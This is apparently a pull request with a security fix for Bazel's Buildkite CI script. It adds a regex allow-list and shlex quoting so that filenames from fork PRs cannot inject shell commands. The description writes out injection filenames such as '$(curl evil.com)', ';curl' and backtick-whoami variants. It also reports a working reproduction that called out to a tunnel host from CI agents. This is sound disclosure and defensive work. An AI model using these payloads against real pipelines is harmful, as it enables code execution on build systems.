### PR TITLE
bazelci: sanitize fork-PR filenames in create_config_validation_steps

### DIFF
--- a/buildkite/bazelci.py
+++ b/buildkite/bazelci.py
@@ -32,6 +32,7 @@ import platform as platform_module
 import random
 import re
 import requests
+import shlex
 import shutil
 import stat
 import subprocess
@@ -3393,11 +3394,14 @@ def get_platform_for_task(task, task_config):
     return task_config.get("platform", task)
 
 
+_SAFE_CONFIG_PATH = re.compile(r"^\.bazelci/[A-Za-z0-9_./-]+\.(yml|yaml)$")
+
+
 def create_config_validation_steps(git_commit):
     config_files = [
         path
         for path in get_modified_files(git_commit)
-        if path.startswith(".bazelci/") and os.path.splitext(path)[1] in CONFIG_FILE_EXTENSIONS
+        if _SAFE_CONFIG_PATH.fullmatch(path)
     ]
     return [
         create_step(
@@ -3405,7 +3409,7 @@ def create_config_validation_steps(git_commit):
             commands=[
                 fetch_ci_scripts_command(),
                 "{} bazelci.py project_pipeline --file_config={}".format(
-                    PLATFORMS[DEFAULT_PLATFORM]["python"], f
+                    PLATFORMS[DEFAULT_PLATFORM]["python"], shlex.quote(f)
                 ),
             ],
             platform=DEFAULT_PLATFORM,


### PR DESCRIPTION
## What

`buildkite/bazelci.py:create_config_validation_steps` builds a Buildkite step whose `commands:` array embeds a filename returned by `git diff-tree --name-only` directly into a shell-executed string via `str.format()`:

```python
commands=[
    fetch_ci_scripts_command(),
    "{} bazelci.py project_pipeline --file_config={}".format(
        PLATFORMS[DEFAULT_PLATFORM]["python"], f
    ),
],
```

`f` originates from a fork PR diff. Filenames may legitimately contain shell metacharacters (`$`, backtick, `;`, parens, space, `|`, `>`, `<`); `git diff-tree --name-only` emits them verbatim (its quoting rule only escapes control bytes / non-ASCII). The current filter:

```python
if path.startswith(".bazelci/") and os.path.splitext(path)[1] in CONFIG_FILE_EXTENSIONS
```

passes a name like `.bazelci/x$(curl evil.com).yml` because:
- `startswith(".bazelci/")` is a literal prefix check, not a path-shape check
- `os.path.splitext()` splits on the last dot, so a substitution-laden middle leaves the `.yml` extension intact

The filename then lands in a `commands:` entry that the Buildkite agent executes via `/bin/bash -e -c`, where bash performs command substitution on `$(...)` (and word-splitting on `;`, `|`, etc.) before the `python3 bazelci.py …` invocation that the step is supposed to run.

## Reproduction

End-to-end demonstrated via fork PR #651 against `bazelbuild/remote-apis-sdks` → public build #4634:

https://buildkite.com/bazel/remote-apis-sdks/builds/4634

The build ran a step labeled `:cop: Validate .bazelci/x$(curl -A rep07-pwn-marker pizza-nat-documented-designation.trycloudflare.com).yml`. The agent (Google Cloud IP `35.222.106.97`) issued an outbound HTTP GET to attacker-controlled infrastructure with `User-Agent: rep07-pwn-marker` — i.e. the `$(curl ...)` substitution executed on the agent before the python invocation could run.

A second build (#4635) reproduced this on a different agent in a separate Google Cloud subnet (`34.44.190.140`).

## Fix

Two-layer defense:

1. **At the filter** — replace the prefix-and-extension check with a strict allow-list regex `^\.bazelci/[A-Za-z0-9_./-]+\.(yml|yaml)$`. All real `.bazelci/*.yml` files across the `bazelbuild/*` repos match this shape; the regex rejects shell metacharacters at the source. If a future config introduces a non-conforming filename it will surface as a missing validation step, which is loud rather than silent.

2. **At command composition** — pass `f` through `shlex.quote()` before `str.format()`. Defense-in-depth: even if the filter is later relaxed or a future call site forgets it, the bash invocation stays safe.

`shlex` is stdlib, no new dependency.

## Regression test

A standalone test mocks `get_modified_files` and runs `create_config_validation_steps` against:

- `.bazelci/x$(curl -A pwn evil.com).yml`, `.bazelci/y;curl evil.com.yml`, `` .bazelci/z`whoami`.yml `` — must be filtered out (no step emitted)
- `.bazelci/normal.yml`, `.bazelci/normal-name_v2.yaml`, `.bazelci/sub/dir/file.yml` — must each produce a validate step with `--file_config=` followed by the filename verbatim (un-mangled, no extra quoting needed since they are already shell-safe)

Before this PR, the metachar filenames produce a step where the bash command contains `--file_config=.bazelci/x$(curl -A pwn evil.com).yml`, and `bash -c` performs the substitution before `python3` is invoked.

After this PR, those filenames are rejected at the filter; the only filenames that reach `shlex.quote()` are alphanumeric ones it leaves unchanged.

I'm happy to fold the regression test into a maintained location in the repo if there's a preferred home for it (`bazelci_test.py` looked like the natural place; I avoided adding tests there blind in case there are conventions I missed).

## Why now

External contributors can open fork PRs against any pipeline whose base-branch `.bazelci/presubmit.yml` sets `validate_config: 1` and whose terraform sets `build_pull_request_forks = true` — a non-empty subset of `bazelbuild/*` pipelines. When such a PR adds a `.bazelci/<metachar>.yml` file, the filename runs through bash on the agent before any python sandboxing — the agent step has the full docker plugin stack (`privileged: true`, `propagate-environment: true`, `network: host`, `/var/run/docker.sock` mount, `/var/lib/buildkite-agent` mount), so a successful substitution lands in the same trust context as a runner step.

Reported via Google OSS VRP (intake 2026-04-25). PR #2572 closed the YAML-content vector by having `load_config()` read from the base branch; this finding is the separate filename channel that survives that fix because the diff that *names* the lint targets still comes from the fork.